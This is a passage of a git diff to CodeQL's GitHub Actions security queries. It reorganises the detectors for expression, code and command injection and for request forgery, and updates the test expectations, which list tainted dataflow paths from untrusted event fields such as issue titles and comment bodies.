instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql deleted file mode 100644 index e24b1ab9ddc0..000000000000 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ /dev/null @@ -1,48 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql deleted file mode 100644 index 1e7414e5ce6d..000000000000 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ /dev/null @@ -1,42 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision high - * @id actions/expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql new file mode 100644 index 000000000000..69ab240616e6 --- /dev/null +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -0,0 +1,31 @@ +/** + * @name Code injection on a privileged context + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +where + CodeInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 228c94f383b9..3700201c3152 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -12,27 +12,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.RequestForgeryQuery +import RequestForgeryFlow::PathGraph -private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink +where RequestForgeryFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref deleted file mode 100644 index ceb027c8058d..000000000000 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected similarity index 58% rename from ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 8a3d19402b7c..13d146a2570f 100644 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref new file mode 100644 index 000000000000..2c7cc5c5fde0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 4ef832d9d22e..23e502567561 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -1,14 +1,286 @@ edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output 